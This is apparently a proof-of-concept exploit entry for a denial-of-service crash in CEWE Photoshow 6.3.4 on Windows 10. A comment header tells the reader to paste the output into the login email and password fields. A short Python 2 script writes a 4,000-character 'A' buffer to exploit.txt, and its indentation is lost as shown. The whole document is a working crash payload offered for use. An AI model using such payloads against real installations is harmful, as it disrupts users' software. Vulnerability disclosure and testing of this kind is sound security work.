# Exploit Title: CEWE Photoshow 6.3.4 - Denial of Service (PoC)# Author: Gionathan "John" Reale# Discovey Date: 2018-08-17# Homepage: https://cewe-photoworld.com/# Software Link: https://cewe-photoworld.com/creator-software/windows-download# Tested Version: 6.3.4# Tested on OS: Windows 10# Steps to Reproduce: Run the python exploit script, it will create a new # file with the name "exploit.txt" just copy the text inside "exploit.txt"# and start the program. Once inside of the CEWE Photoshow program click "Login". In the new window paste the content of # "exploit.txt" into the following fields:"email address" & "Password". Click "Ok" and you will see a crash.#!/usr/bin/python
buffer = "A"* 4000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.."%len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
